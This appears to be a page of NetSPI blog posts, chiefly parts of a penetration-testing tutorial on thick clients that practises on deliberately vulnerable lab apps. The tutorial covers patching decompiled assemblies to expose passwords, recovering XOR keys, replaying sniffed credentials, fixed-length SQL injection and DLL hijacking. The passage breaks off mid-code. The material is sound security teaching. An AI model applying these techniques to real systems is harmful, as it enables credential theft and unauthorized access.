Introduction to Hacking Thick Clients: Part 4 – The Assemblies

Introduction to Hacking Thick Clients is a series of blog posts that will outline many of the tools and methodologies used when performing thick client security assessments. In conjunction with these posts, NetSPI has released two vulnerable thick clients: BetaFast, a premier Betamax movie rental service, and Beta Bank, a premier finance application for the elite. Many examples in this series will be taken directly from these applications, which can be downloaded from the BetaFast GitHub repo. A brief overview is covered in a previous blog post.


  1. The GUI
  2. The Network
  3. The Filesystem and Registry
  4. The Assemblies
  5. The API
  6. The Memory

Assembly Controls

Libraries and executables can be compiled with some additional security measures to protect against code exploitation:

  • Address Space Layout Randomization (ASLR) – An application’s locations in memory are randomized at load time, mitigating attacks such as return-to-libc that achieve code execution by targeting known addresses.
  • SafeSEH – A list of safe exception handlers is stored within the binary, preventing an attacker from forcing the application to execute a malicious exception handler.
  • Data Execution Prevention (DEP) – Areas of memory can be marked as non-executable, preventing an attacker from storing code for a buffer overflow attack in these regions.
  • Authenticode/Strong Naming – Assemblies can be protected by signing. If assemblies are left unsigned, an attacker can modify them or replace them with malicious content.
  • Control Flow Guard (CFG) – An extension of ASLR and DEP that restricts the addresses from which code can execute.
  • High Entropy VA – Indicates that a 64-bit application can use the full 64-bit address space for ASLR, making the randomization far more effective.

Thankfully, NetSPI’s very own Eric Gruber has released a tool called PESecurity to check if a binary has been compiled with the above code execution preventions. Many of the thick client applications we test have installation directories filled to the brim with assemblies, and PESecurity is especially useful for checking a large number of files.

In the below example, PESecurity is used to check BetaBank.exe. It is compiled with ASLR and DEP, and SafeSEH is only applicable to 32-bit assemblies. The executable, however, is unsigned.

[Screenshot: PESecurity results for BetaBank.exe]
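These compile-time protections live in the DllCharacteristics field of the PE optional header, which is what tools like PESecurity inspect. As a rough illustration of the idea (a minimal parser written for this post, not PESecurity's actual implementation), the flags can be read with a little Python:

```python
import struct

# IMAGE_OPTIONAL_HEADER DllCharacteristics flags, per the PE/COFF spec
DYNAMIC_BASE    = 0x0040  # ASLR
NX_COMPAT       = 0x0100  # DEP
GUARD_CF        = 0x4000  # Control Flow Guard
HIGH_ENTROPY_VA = 0x0020  # 64-bit high-entropy ASLR

def check_pe_protections(data):
    """Report compile-time protections for a PE image given as bytes."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of PE header
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file")
    opt = e_lfanew + 4 + 20               # skip signature + COFF file header
    magic = struct.unpack_from("<H", data, opt)[0]
    chars = struct.unpack_from("<H", data, opt + 70)[0]  # DllCharacteristics
    return {
        "64bit": magic == 0x20B,          # PE32+ vs. PE32
        "ASLR": bool(chars & DYNAMIC_BASE),
        "DEP": bool(chars & NX_COMPAT),
        "CFG": bool(chars & GUARD_CF),
        "HighEntropyVA": bool(chars & HIGH_ENTROPY_VA),
    }
```

Run it against a real binary with `check_pe_protections(open("BetaBank.exe", "rb").read())`. PESecurity additionally checks things like Authenticode signatures and strong naming, which this sketch does not.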


Decompiling is one of my favorite parts of testing thick clients. As someone who has made far too many programming mistakes, it’s cathartic to find those of other programmers. By their very nature, .NET assemblies can be read as source code using decompilers such as dnSpy, ILSpy, and dotPeek.

This is because .NET assemblies are managed code. When a .NET application is compiled, it’s compiled to Intermediate Language (IL) code. Only at runtime is the IL finally compiled to machine code by the runtime environment. .NET assemblies are so easy to “reverse” into source code because the IL retains so much metadata, such as type and member names.

Unmanaged code, such as C or C++, is compiled directly to machine code. It doesn’t run through a runtime the way C# does with the Common Language Runtime – it’s loaded directly into memory.

Information Disclosures

Managed Code

The following example will use the aforementioned BetaBank.exe, found in our BetaFast GitHub repo, with dnSpy as the decompiler of choice.

One of the first things I look for when testing a thick client application is hardcoded sensitive information such as credentials, encryption keys, and connection strings. Decompiling isn’t even required to find sensitive information – configuration files are great places to look. When a .NET assembly runs, it may read global values such as a connection string, web endpoints, or passwords from a configuration file. Procmon and the steps outlined in the previous entry are very useful for identifying these files. Sure enough, there’s a connection string stored right in Beta Bank’s config file. It can be used to authenticate directly to the database with a tool such as SQL Server Management Studio.
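For example, a hypothetical App.config with an embedded connection string might look like the snippet below (the server address, database name, and credentials are all made up for illustration):

```xml
<configuration>
  <connectionStrings>
    <!-- Hypothetical example: every value below is made up.
         Credentials like these belong in a secrets store, not in a
         config file readable by anyone with access to the install dir. -->
    <add name="BetaBankDb"
         connectionString="Data Source=192.168.1.10;Initial Catalog=BetaBank;User ID=sa;Password=NotARealPassword1!"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>
```

Anyone who can read this file can connect to the database with the application’s privileges.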


If you’re wondering about the address, that’s the VM I’m running Docker in.


But to find information disclosures in the source code itself, first decompile one of the application’s binaries. Below, BetaBank.exe is loaded into dnSpy.


dnSpy has a solid search feature. I type in terms like “key,” “IV,” “connection,” “password,” “encrypt,” and “decrypt” to look for how the application handles encryption, authentication, and database connections. Searches can also be filtered – below, I limited the search to Selected Files, but it can also be scoped to specific libraries and object types. Looks like there’s a hardcoded key in BetaBank.ViewModel.RegisterViewModel and BetaBank.ViewModel.LoginViewModel.


And searching for “password” shows a hardcoded encrypted password. Apparently the developer(s) implemented an authorization check on the client side. The username “The_Chairman” is compared directly to the value in the Username textbox, and the hardcoded encrypted password is compared directly to the encrypted value of the Password textbox contents.
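Stripped to its essence, the flawed pattern looks something like this hypothetical Python sketch (not the actual BetaBank source; the ciphertext value is made up):

```python
# Hypothetical sketch of the client-side check described above - not the
# actual BetaBank source. Both comparison values ship inside the binary.
HARDCODED_USER = "The_Chairman"
HARDCODED_ENC_PASSWORD = "dGhpcyBpcyBub3QgcmVhbA=="  # made-up ciphertext

def is_chairman(username, encrypted_password):
    # Compares the textbox values (password already encrypted client-side)
    # against the hardcoded pair - the server is never consulted.
    return (username == HARDCODED_USER
            and encrypted_password == HARDCODED_ENC_PASSWORD)
```

Because both values ship inside the binary, decompiling the client is equivalent to reading the admin credentials.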


The BetaEncryption class can be decompiled, showing some very custom encryption logic.


Unmanaged Code

As I mentioned at the beginning of this section, it’s not possible to get such a clean look at the source code when testing unmanaged code. Instead, we once again look to the CTO of Microsoft Azure for help. Strings is a tool in the Sysinternals suite that outputs the printable strings embedded in an executable. When analyzing memory dumps or unmanaged binaries, I retrieve the full list of strings (most of them will look like nonsense), then search for key terms like the ones above in a text editor of choice.
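The core of what Strings does is simple enough to sketch: scan the file for runs of printable characters and keep the long ones. A rough Python approximation (illustrative, not the Sysinternals implementation) that also greps the results for interesting terms:

```python
import re

def extract_strings(data, min_len=6):
    """Pull printable-ASCII runs out of a binary blob, like Sysinternals Strings."""
    return re.findall(rb"[ -~]{%d,}" % min_len, data)

def grep_secrets(data, keywords=(b"password", b"key", b"connect")):
    """Keep only the extracted strings that contain an interesting keyword."""
    return [s for s in extract_strings(data)
            if any(k in s.lower() for k in keywords)]
```

Point it at a binary with `grep_secrets(open("target.exe", "rb").read())` and skim whatever survives the filter.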

Modifying Assemblies

Using dnSpy, a class can actually be modified, and the binary can be recompiled. Below, I’ve reversed the Encrypt function, and I use a MessageBox to show the decrypted adminPassword when a user successfully authenticates to the application.

[Screenshot: the modified Encrypt function in dnSpy]

Saving the module as a new executable . . .


Finally, when I authenticate as a user, the MessageBox prints The_Chairman’s password.


A MessageBox is very useful to add to the application when trying to gather information. It’s like when I use a print statement instead of a debugger.

A Beta Bank developer may decide to patch this vulnerability by removing the hardcoded encryption key. However, Beta Bank’s custom encryption can still be reverse engineered to gather the key for decryption. Below, I’ve added a function that performs an XOR on the plaintext password and the encrypted password, thus exposing the encryption key. In the Decrypt function, I retrieve the key by passing a known plaintext password (my own) and its encrypted value.
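Because the scheme boils down to a repeating-key XOR, a single known plaintext/ciphertext pair exposes the key: XOR is its own inverse. Here is a hypothetical Python model of the attack, mirroring the custom scheme’s pad-and-XOR logic (the function names and values are mine, not Beta Bank’s):

```python
import base64

def xor_encrypt(key, plaintext):
    """Repeating-key XOR with null padding - the same shape as the custom scheme."""
    pt = bytearray(plaintext.encode("ascii"))
    while len(pt) % len(key) != 0:
        pt.append(0x00)
    ct = bytes(b ^ key[i % len(key)] for i, b in enumerate(pt))
    return base64.b64encode(ct).decode("ascii")

def recover_key(known_plaintext, ciphertext_b64):
    """XOR a known plaintext with its ciphertext to expose the key stream."""
    ct = base64.b64decode(ciphertext_b64)
    pt = known_plaintext.encode("ascii")
    return bytes(c ^ p for c, p in zip(ct, pt))
```

recover_key returns as many key bytes as there are known plaintext bytes; a plaintext at least as long as the key recovers it completely.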


But that was actually too much work. If we don’t need The_Chairman’s password for later, the username and encrypted password can just be placed directly into the Login function. Boolean logic can also be modified in the client so that a check such as IsAdmin() always returns true, even if the actual verification happens server-side.



Source code isn’t often this legible. Sometimes, code is obfuscated. And while obscurity provides no real security, it sure does make the job of a security consultant a little more difficult.

Below is the BetaEncryption class from earlier after I applied some custom obfuscation by mashing my keyboard to rename the class, methods, and parameters.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

public static class jinjnhglkjd
{
    public static string dsfggd(byte[] erttr, string dgfhfgi)
    {
        byte[] plaintextBytes = Encoding.ASCII.GetBytes(dgfhfgi);

        byte[] ciphertextBytes;

        int messageLength = plaintextBytes.Length;

        while (messageLength % erttr.Length != 0)
        {
            Array.Resize(ref plaintextBytes, plaintextBytes.Length + 1);
            plaintextBytes[plaintextBytes.Length - 1] = 0x00;
            messageLength += 1;
        }

        ciphertextBytes = new byte[messageLength];
        int startingIndex = 0;
        for (int i = 0; i < (messageLength / erttr.Length); i++)
        {
            for (int j = 0; j < erttr.Length; j++)
            {
                ciphertextBytes[j + startingIndex] = Convert.ToByte(plaintextBytes[j + startingIndex] ^ erttr[j]);
            }
            startingIndex += erttr.Length;
        }

        return Convert.ToBase64String(ciphertextBytes);
    }
}
All of the functionality is still there. Some obfuscation techniques go even further to make code illegible, but what this does is make the source more difficult to search through and reverse engineer. The Assembly Explorer in dnSpy would be full of nonsense class names, and searching for specific terms such as “Encrypt” would not yield any results.

There are various tools for deobfuscation, such as de4dot. Below is an example of what a deobfuscator might turn my keyboard-mashing obfuscation into. The classes at least have some sense of legibility, and methods are named some variation of method rather than dsfggd.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

public static class class_1
{
    public static string method_1(byte[] byte_1, string string_1)
    {
        byte[] plaintextBytes = Encoding.ASCII.GetBytes(string_1);

        byte[] ciphertextBytes;

        int messageLength = plaintextBytes.Length;

        while (messageLength % byte_1.Length != 0)
        {
            Array.Resize(ref plaintextBytes, plaintextBytes.Length + 1);
            plaintextBytes[plaintextBytes.Length - 1] = 0x00;
            messageLength += 1;
        }

        ciphertextBytes = new byte[messageLength];
        int startingIndex = 0;
        for (int i = 0; i < (messageLength / byte_1.Length); i++)
        {
            for (int j = 0; j < byte_1.Length; j++)
            {
                ciphertextBytes[j + startingIndex] = Convert.ToByte(plaintextBytes[j + startingIndex] ^ byte_1[j]);
            }
            startingIndex += byte_1.Length;
        }

        return Convert.ToBase64String(ciphertextBytes);
    }
}

Obfuscation doesn’t secure code. But it makes browsing the source even more of a headache than reading someone else’s large codebase typically is.


Why Organizations Should Think More Holistically About Preparing for and Responding to a Security Breach

In a recent episode of Agent of Influence, I talked with Sean Curran, Senior Director in West Monroe Partners’ Technology Practice in Chicago. Curran specializes in cybersecurity and has over 20 years of business consulting and large-scale infrastructure experience across a range of industries and IT domains. He has been in the consulting space since 2004 and has provided risk management and strategic advice to many top-tier clients. Prior to consulting, Curran held multiple roles with National Australia Bank.

I wanted to share some of his insights in a blog post, but you can also listen to our interview here, on Spotify, Apple Music or wherever you listen to podcasts.

Cybersecurity Challenges of COVID-19

From Curran’s perspective, the COVID-19 pandemic has created a lot of challenges for organizations, many of which weren’t prepared for this situation. For example, some organizations primarily used desktop computers and now their employees are being asked to work from home without laptops, which is particularly hard at a time when hardware is difficult to source.

In addition, many companies had processes in place that they never tested – or their processes were too localized. While many companies are prepared to withstand a disaster in one location – for example, Florida in case of a hurricane – COVID-19 has affected the entire world, and organizations weren’t prepared to withstand that. The widespread global impact is why most companies’ disaster recovery and business continuity plans are failing.

The same thing goes for cyberattacks – they aren’t localized to a particular building or region, which is a challenge when most companies are only set up to lose a single building or a single data center.

As during other similar situations, we have seen an increase in cyberattacks during the COVID-19 pandemic, meaning organizations are not only having to implement their business continuity plans on a very broad scale, but also ensure cybersecurity during a heightened period of attacks.

What Makes an Organization Prone to a Security Breach?

People. Budget. And more. Sometimes it’s just that the organization is focused on the wrong things. Or they still believe that security is the security team’s responsibility – but it’s everyone’s responsibility.

Curran has seen organizations with a small number of employees and low budgets do some really amazing things, showing it comes down to the capability of the individuals involved and how interested they are in security.

Organizations also need to strike a balance of protecting themselves from old attack methods while thinking about what the next attack method might be. Attackers are very good at figuring out what security teams are looking at, ignoring it, and moving on to the next delivery mechanism. At the same time, ignoring an old attack method isn’t necessarily the right approach either because we do see attackers re-using old schemes when people have moved on and forgotten about it – or combining several old attack methods into a new one.

Key Steps After a Breach

It’s critical to first understand the point at which your employee fell victim to the virus. The day the antivirus program alerts you that you have a virus isn’t necessarily the day you got the virus.

Then you need to understand what the virus did when someone clicked on a link. Was it credential stealing or malware dropping?

To understand this, you can use sandbox toolboxes, which allow you to drop in an email or an application, or point to a website, and the toolbox will tell you what the virus did. Curran uses a tool called Joe Sandbox.

Once you understand what the virus did, you can determine next steps. For example, if it was credential stealing, you need to think about what those user credentials have access to. It’s critical to think holistically here – if the user gave away internal credentials, are they re-using those for personal banking platforms or a Human Resources Information System (HRIS)? People tend to think myopically around active directory, but Curran argues that we need to start thinking beyond that, especially as we start using cloud services.

Curran pointed out that social communication is happening on almost every platform, including Salesforce, Slack, and more. Everything has a social component to it, meaning also that there’s a new delivery mechanism that attackers could start to use.

It’s critical for organizations to start thinking more holistically about how they prepare for and respond to a security breach. For many organizations, the COVID-19 pandemic has created a perfect storm of trying to implement business continuity plans that weren’t tested or up to the task, while also ensuring security during a heightened time of cyberattacks.

To listen to the full podcast, click here, or you can find Agent of Influence on Spotify, Apple Music, or wherever you listen to podcasts.


Introduction to Hacking Thick Clients: Part 3 – The File System and Registry

Introduction to Hacking Thick Clients is a series of blog posts that will outline many of the tools and methodologies used when performing thick client security assessments. In conjunction with these posts, NetSPI has released two vulnerable thick clients: BetaFast, a premier Betamax movie rental service, and Beta Bank, a premier finance application for the elite. Many examples in this series will be taken directly from these applications, which can be downloaded from the BetaFast GitHub repo. A brief overview is covered in a previous blog post.


  1. The GUI
  2. The Network
  3. The File System and Registry
  4. The Assemblies
  5. The API
  6. The Memory

Information Disclosure

Many applications have been written by developers who could not resist the sweet siren song of storing sensitive information in the file system and/or registry. This has included social security numbers, credit card numbers, database connection strings, credentials, etc. Developers may encrypt this data for an added sense of security, but there could be an insecure or custom encryption implementation. If it is a necessity to store encrypted data, the key must always be stored in a separate location, such as securely in a database.

Focusing the Test

Testing for information disclosures in the file system and registry is quite simple – you just need to look at the files and registry keys used by the application and make sure there isn’t any sensitive information there. But applications often make an insane number of calls to files and registry keys. That’s why it is crucial to focus on the areas of the application most likely to write or read sensitive data.


If it’s possible to test the installation, always use this as an opportunity to look for writes to the file system or registry. It’s the perfect time for data to be written that the application will later read. Will the application be connecting to a database? Maybe the installation process writes the database connection string to a registry key. Maybe default administrator credentials are being stored in the file system.


In the actual application, identify functional areas that may create or modify sensitive information. This always includes the initial database connection and a login form. Plenty of applications save some information for a Remember Me function, so determine how that’s being stored and retrieved. In the authenticated portion of the application, look for areas that specifically handle sensitive data.

Tools and Examples

The Sysinternals suite contains many helpful tools for testing Windows applications. The two tools I will be highlighting are AccessEnum and Process Monitor, written by the CTO of Microsoft Azure. The vulnerable application I will be highlighting is BetaFast, written by the owner of 32 Arnold Schwarzenegger movies.


Process Monitor will show you more information than you thought was possible, so the first step is to set up a filter. One attribute Process Monitor can filter on is the PID of the application you’re testing, so be sure to check for that in Task Manager.


In this example, I also filtered by Event Class.

[Screenshot: Process Monitor filter configuration]

When opening BetaFast, a login form with a Remember Me function is immediately displayed.

[Screenshot: BetaFast login form with a Remember Me checkbox]

With Process Monitor running, authenticate to the application and allow it to remember your credentials. Notice that two RegSetValue operations are performed – one for a username, another for a password. Also note how many events actually took place there but were ignored thanks to the filter.

[Screenshot: Process Monitor showing the RegSetValue operations for the credentials]

The registry paths might not be as obvious as Credentials\Password, so it’s more important to look for specific operations rather than paths. Registry Editor can be used to view the paths from the previous step, displaying cleartext credentials.

[Screenshot: cleartext credentials in Registry Editor]

AccessEnum allows us to determine who can read and write registry keys and directories. The Credentials registry key can only be read by Administrators and NT AUTHORITY\RESTRICTED. Since this is in HKEY_CURRENT_USER, these credentials would only be exposed to highly privileged accounts and the current user. But they would still be exposed.

[Screenshot: AccessEnum results for the registry key]
File System

BetaFast also has a payment details form. Process Monitor can analyze what the Load Payment Details button is attempting to load.

[Screenshot: the Load Payment Details form]

The application is looking for a file in C:\ProgramData\BetaFast\PaymentDetails with the current user’s name.

[Screenshot: Process Monitor capturing the Load Payment Details file read]

The next step is to submit the form with Save Payment Details checked and see what’s happening in the file system.

[Screenshot: the payment details form with Save Payment Details checked]

Unsurprisingly, the file that Load Payment Details was looking for is now saved.

[Screenshot: Process Monitor capturing the file write]

The file also unsurprisingly contains cleartext credit card information.

[Screenshot: the saved file containing cleartext credit card information]

AccessEnum shows that everyone can read this file.

[Screenshot: AccessEnum results for the file]

Of course, this shouldn’t be surprising either. ProgramData is not user-specific while the AppData folder is. Storing cleartext sensitive information in AppData would still show up in one of our reports, but at least it wouldn’t be readable by everyone on the system.

DLL Hijacking

This topic could be a blog or two of its own, and we even have one from 2012. But it also has to do with the file system, so it’s worth a brief overview here as well.

  1. Applications will search for DLLs to load.
  2. Some applications will not specify a fully qualified path.
  3. Windows will search a predefined order of directories for this DLL.
  4. Using Process Monitor, an attacker could identify this DLL because the application would be trying to open a .dll file that could not be found.
  5. An attacker could then place a malicious DLL in one of the directories in the search order, causing the application to execute malicious code.
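The search described in the steps above can be modeled roughly as follows. This is a simplified sketch (the real search order has more entries and depends on settings such as SafeDllSearchMode), with an `exists` hook so the logic is easy to demonstrate:

```python
import os

# Simplified model of the DLL search: walk the directories in order and
# return the first match. The `exists` hook defaults to a real filesystem
# check but can be swapped out for testing or simulation.
def find_dll(dll_name, search_order, exists=os.path.isfile):
    for directory in search_order:
        candidate = os.path.join(directory, dll_name)
        if exists(candidate):
            return candidate
    return None  # the load fails - Process Monitor shows the failed opens
```

If the legitimate DLL is absent from the earlier, protected directories, any attacker-writable directory later in the order wins the race; that is the hijack.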

The problem with DLL hijacking lies in step 5, and it mostly comes down to configuration issues. Microsoft highlights a few different attack scenarios and their severities in this article. They also have an article on how to prevent and identify these attacks. For even more reading on attack scenarios, check out this article as well as this one.

The main point I wanted to cover is that file system vulnerabilities don’t just come from writing data – they sometimes stem from what’s being read. Also, Process Monitor is again very useful.



Challenges and Keys to Success for Today’s CISO from the Former CISO at the CIA

Developing the CISO Role at the CIA

When I started as CISO of the CIA, no one really understood the role or what to do with the CISO. The government had mandated that every government agency had to have one, but as the second CISO of the CIA, it was evident when I took the role that there weren’t clear guidelines around my responsibilities in the organization. While we were an element in the overall security program with the agency, there was the classic argument about if I reported to the CIO or the Chief of Security. Therefore, initially, I was responsible for defining what the CISO role would be and how I could have the greatest influence and impact on the agency.

Over time, the organization grew, and individuals started to see areas where they could rely on the CISO. For example, as we started to use the Internet more broadly and began to consider taking on perhaps more risky technology or operational choices, people in the organization were asking, “Who do we go to, to find out what the risk is?” And that’s when they started to proactively turn to me as the CISO and get me involved.

As CISO, my primary responsibility was defining standards, policies, requirements, and responsibilities, and communicating those throughout the agency. Governance is the not so sexy part of cyber, but it was our primary responsibility to make sure every system we developed and operated met very high levels of security. This included all aspects, from planning, integration, testing, approval, and the standard way you would deliver systems.

The things we were super serious about were critical because we couldn’t make a mistake, so that was the easy part. The hard part was that the risks were high. If you made a mistake – and mistakes were made in judgment, in operations, in support, and in the use of certain technologies – you had to be able to recover from, understand them, learn from them and move on. No one’s perfect and none of our IT systems are perfect, so we had to deal with that issue.

Every system delivered and deployed was a collection of technology, so a lot of planning and thinking about how best to use technology and what things we needed to do to lower our profile and risks went into each project. In large part, I was trying to help senior managers understand what the risks were and make coaching decisions about cyber risk.

I experienced an interesting evolution of involvement in our own IT life (administrative IT and analytical IT) to also becoming more involved in operational use of IT technologies in the whole agency. Later, I also got more involved in strategic planning – looking into the future and what types of cybersecurity skills people would need and what technology we were going to be using.

Biggest Challenges of Being a CISO Today

1. Most Organizations Don’t Do IT Well

The problem I see in private industry that makes a CISO’s life most challenging is that organizations don’t do IT very well. If an organization doesn’t do IT well, they’re not going to do IT security well. I’ve never seen an organization do IT poorly but do IT security well.

What I mean by “not doing IT well,” is they have no central planning, no central governance, no focus, and no strategy. Everyone in the business is out building their own thing, making their own deals, going to the wrong cloud providers, building their own systems, and making connections with their own vendors. It’s a free-for-all and the poor CISOs are trying to keep track, keep management, and keep control from a security perspective of all this constant noise and constant change in the environment, which they say has to work at the pace of the business because they’re always looking for opportunities to grow the bottom line.

This posture forces CISOs away from good planning and good strategy towards running after the next big opportunity. The business is going to build the application, they’re going to deploy the application, or they’re going to make the deal with the third-party vendor whether the CISO is with them or not because there’s no penalty for not having the CISO with them.

2. The Bulk of a CISO’s Time is Spent on Reactive Projects

A second big problem for most CISOs is that they spend 80 percent of their time on reactive projects versus 20 percent on proactive projects. Even in organizations that are better or more centrally managed where there’s an IT portfolio of known projects and processes, you still have shadow or ghost IT where there’s a risk because of the way most businesses conduct themselves with their IT. The cloud hasn’t helped either. Most of these companies have three, four, five different cloud projects going at the same time across their company, making life very difficult for the CISO and forcing them to spend the bulk of their time being reactive.

Keys to Being a Successful CISO

1. Instill a Sense of Responsibility in Your IT Organization for Cybersecurity

CISOs should instill some sense of responsibility in their IT organization for cybersecurity.

I was working with a company recently where we finally got an agreement with all the senior IT managers of innovation, digital innovation, application development, and systems deployment that each one of them in their performance appraisal, would now have a rating on how well they implement cybersecurity policy and support the cybersecurity program – and the CISO will write that review. We did that because of the way the organization was continually disregarding cybersecurity policy standards. Many knew what they were supposed to do but were disregarding it, so we knew we had to fix that problem first.

You must make cybersecurity part of IT governance.

2. Don’t Focus on Compliance

This is hard, especially for financial services organizations that must comply with various regulations. But when you’re chasing the compliance checklist, you’re usually not focusing on the sophisticated APT (advanced persistent threat) groups. Too often when I go into organizations and find out what they’re doing, they’re working on a variety of cybersecurity projects, mostly because an auditor came down to their office with that direction and then the next month came with a different direction, and so on. And soon, the organization is working on an odd collection of projects.

But, most importantly, what they’re not focusing on is the real risk and the real risk is sitting in Russia coming up with better attack payloads and techniques. This is what organizations need to be focusing on, much more so than they are today.


Dark Reading: Organizations Conduct App Penetration Tests More Frequently – and Broadly

On May 13, 2020, NetSPI President and COO Aaron Shilts was featured in Dark Reading.

Aaron Shilts, president and chief operating officer at security testing firm NetSPI, says faster software development life cycles and inefficiencies in manual deep-dive penetration testing programs are driving interest in PTaaS.

Organizations are overloaded with traditional pen-test PDF deliverables, many of which can contain a mountain of findings, he says. This has made it difficult for organizations to prioritize, correlate, and drive remediation activities.

“PTaaS is essentially an enriched delivery model, making it easier for customers to consume testing services, from initial scoping to reporting,” he says. “It ultimately helps to accelerate the remediation process.”

Read the full article here.


Introduction to Hacking Thick Clients: Part 2 – The Network

Introduction to Hacking Thick Clients is a series of blog posts that will outline many of the tools and methodologies used when performing thick client security assessments. In conjunction with these posts, NetSPI has released two vulnerable thick clients: BetaFast, a premier Betamax movie rental service, and Beta Bank, a premier finance application for the elite. Many examples in this series will be taken directly from these applications, which can be downloaded from the BetaFast GitHub repo. A brief overview is covered in a previous blog post.


  1. The GUI
  2. The Network
  3. The File System and Registry
  4. The Assemblies
  5. The API
  6. The Memory


In this post, we’ll cover network testing in thick client applications and how it’s performed on different architectures. BetaFast is written with a three-tier architecture.

  • Tier 1: The client displays and collects data.
  • Tier 2: Web requests are sent to a server where business logic is handled.
  • Tier 3: A database server modifies and retrieves data for the application server.

Beta Bank is written with a two-tier architecture.

  • Tier 1: The client displays and collects data.
  • Tier 2: A database server handles business logic and performs data queries and modifications for the client.

One-tier architecture also exists, but it’s not applicable to this blog post because the client, business logic, and data storage are all on the same system. There can be more than three tiers, but the same methods and tools outlined below will apply.



One of the first things I like to do when I begin a thick client application test is see what’s actually happening on the network. And to do that, I use a tool called Wireshark to capture and filter network traffic.


In this example, I’m testing the Beta Bank vulnerable application. With a proper capture filter in place, I’ll typically begin by just sort of doing things in the thick client. I’ll submit forms, navigate through the app, modify data, etc. Then, I’ll look through Wireshark for anything sensitive.

  • Is the database connection unencrypted?
  • Is sensitive data, such as social security numbers or medical information, transmitted in cleartext?

At one point, I authenticated to the application with the username “blogger.” Searching through the packet list in Wireshark, the name “blogger” appears in a Login procedure. The fact that this is even remotely legible means that the database connection is unencrypted, and anyone with access to this network is able to read this information just as easily. Thankfully, the password appears to be encrypted, so a hacker won’t be able to access my account.


Or will they?!

Any form of a password sent from a client, whether it’s cleartext, hashed, or encrypted, should be treated as the password itself. Sure, the password is encrypted. But knowing and sending this value to the server will authenticate this user to the application. There’s no additional defense provided by only obscuring a parameter value rather than securely encrypting the entire transmission. Another value observed through Wireshark is the output parameter for the Login procedure – GUID. In an authenticated portion of the application, the procedures accept a GUID as a parameter.


This is what we in the business call a “session ID.” Armed with only this value, an attacker will be able to perform authenticated actions as the blogger user as long as the session remains active.

But even that is making things more complicated than they need to be.

Echo Mirage

In this example, I am the harbinger of revolution – a veteran of the computer who has had enough of the wealthy elite. While you were smelling the roses, I was sniffing the network. And I captured blogger’s username and encrypted password from that Login procedure.

Now, a tool like Echo Mirage comes in handy. Echo Mirage allows TCP traffic to be intercepted and modified. I can authenticate to the application with the username “blogger” and an arbitrary password, then intercept the packet containing the Login procedure.


The encrypted password can be changed to the value captured by Wireshark.
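Why does replaying the captured value work? A minimal sketch of the flawed server logic (hypothetical code, not Beta Bank’s actual implementation) makes it clear that comparing the transmitted ciphertext directly to the stored one turns the ciphertext itself into the credential:

```python
# Hypothetical server-side check: the transmitted "encrypted" password is
# compared directly to the stored value, so the ciphertext IS the credential.
stored_credentials = {"blogger": "6Bb7tqa2mHEZrfSMvTjUhg=="}  # example ciphertext

def login(username, encrypted_password):
    # Whatever arrives on the wire is matched byte-for-byte against storage.
    return stored_credentials.get(username) == encrypted_password

# A value sniffed off the unencrypted database connection replays cleanly.
captured = "6Bb7tqa2mHEZrfSMvTjUhg=="
assert login("blogger", captured)        # authenticated, password never known
assert not login("blogger", "guess123")  # guessing still fails
```

The attacker never decrypts anything; intercepting and resending the value is enough.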


As soon as I send this request, I’m in. Let’s see how much money this big shot blogger has.


Hmmm. Perhaps this blogging thing is more of a hobby. Let’s see who else is banking with Beta Bank. Using the techniques from the previous post in the series, the Withdraw button can be enabled.


Wireshark shows that this function is sending a SQL query.


Echo Mirage can be used to directly modify the SQL statement. It can’t change the length of the packet, but the remaining SQL can be commented out.
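Keeping the packet length fixed is simple to sketch: terminate the injected statement with a line comment, then pad with spaces back to the original size. The query below is illustrative, not Beta Bank’s actual procedure text:

```python
def rewrite_in_place(original, injected):
    """Swap a captured SQL string for injected SQL of identical byte length.

    The intercepted packet can't grow or shrink, so the injected statement
    is terminated with a line comment ("--") and padded with spaces to the
    exact length of the original query.
    """
    if len(injected) + 2 > len(original):
        raise ValueError("injected SQL must fit inside the original packet")
    return (injected + "--").ljust(len(original))

# Hypothetical captured query -- not Beta Bank's actual procedure text.
original = "SELECT Balance FROM Accounts WHERE Username = 'blogger'"
modified = rewrite_in_place(original, "SELECT * FROM Users")
assert len(modified) == len(original)  # packet length unchanged
```

The trailing spaces after the comment marker are harmless, and everything left over from the original statement is commented out.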


The server responds with the Users table. The account connecting to the database clearly has excessive privileges, but we now have info on every user.


There are any number of attack vectors now. There’s still much to explore and modify in the database. But The_Chairman sounds very wealthy and very elite, and their encrypted password is practically begging to be used.


Hackers – 1

Wealthy Elite – 0



Burp Suite

Burp Suite is perhaps the tool I use most on the job. It’s invaluable for any application assessment that deals with HTTP requests and responses. If you haven’t heard of it or used it, there are going to be far more interesting guides out there than this on how powerful the tool can be.

If a thick client is built on a three-tier architecture, the network portion of the test will essentially be the same as testing a web application. First order of business is proxying the traffic. In the proxy tab of Burp, set up a listener on an interface and port of choice.


Next, rather than proxying a browser through Burp, proxy the whole system.


There may be a lot of traffic that doesn’t belong to the application being tested. But this is the time for determining which requests are originating from the thick client. I only restrict the scope in Burp once I know the complete set of hosts the app is reaching out to. With BetaFast, I’ve determined the application is only sending requests to


And now Burp can be used the same as in any web application test. Below, I sent a request to the Repeater tab and found SQL injection.


Closing Remarks

A lot of important things happen over networks, so make sure not to focus only on the client when testing thick client applications! What could Beta Bank and BetaFast have done differently to protect their systems? Well, a good amount. But here are a few examples:

Beta Bank

  • Encrypt database connections – Encrypted connections hide sensitive data from wandering eyes on a network. They also ensure that traffic cannot be modified as long as the encryption is implemented securely.
  • Principle of least privilege – Since Beta Bank connects to the database as a highly-privileged user, an attacker has free rein of the database should an exploit be found. If the account connecting to the database had the least possible privilege, an attacker could not pivot beyond normal functionality.
  • Salted and hashed passwords – Encryption is by its nature reversible. This will be highlighted further in an upcoming entry in this series.
  • Authentication logic – The password being sent over the network should not be directly compared to the password stored in the database. Otherwise, the encrypted password doesn’t even need to be decrypted or a hashed password cracked. The password should be sent as-is in an encrypted transmission. The server then salts and hashes the password and compares the resultant value to the salted and hashed password stored in the database.
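That server-side flow can be sketched with Python’s standard library. This is a minimal sketch; the PBKDF2 parameters are illustrative, not Beta Bank’s actual scheme:

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
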